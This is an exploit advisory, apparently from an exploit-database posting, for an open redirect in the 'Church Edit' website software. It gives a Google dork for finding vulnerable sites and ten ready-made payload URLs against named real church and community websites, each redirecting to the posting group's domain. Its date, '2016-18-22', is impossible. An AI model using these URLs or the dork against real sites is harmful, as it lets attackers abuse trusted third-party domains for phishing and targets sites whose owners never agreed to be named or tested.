######################
# Exploit Title : Church Edit Open Redirect
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.churchedit.co.uk/
# Google Dork : inurl:"goto-link.php?link_id="
# Date: 2016-18-22
# Tested On : windows 7 / FireFox
######################
# Parameter vulnerable : url
# Demos :
#http://www.allsaintsbingley.org.uk/goto-link.php?link_id=22&url=https://www.Ashiyane.org/
#http://www.stgeorgebickley.co.uk/goto-link.php?link_id=11&url=https://www.Ashiyane.org/
#http://www.ibizachurch.org/goto-link.php?link_id=12&url=http://ashiyane.org/
#http://www.gosberton.org/goto-link.php?link_id=11&url=http://ashiyane.org/
#http://www.allsaintscottenham.org.uk/goto-link.php?link_id=11&url=http://ashiyane.org/
#http://www.glosfoodanddrink.org/goto-link.php?link_id=23&url=http://ashiyane.org
#http://www.standrewspsalterlane.org.uk/goto-link.php?link_id=4&url=http://ashiyane.org
#http://www.didcotbaptist.org.uk/goto-link.php?link_id=17&url=http://ashiyane.org/
#http://www.christchurchgreatayton.org.uk/goto-link.php?link_id=20&url=http://ashiyane.org/
#http://www.ballinamallardmethodist.org/goto-link.php?link_id=14&url=http://ashiyane.org
######################
# discovered by : Amir.ght
######################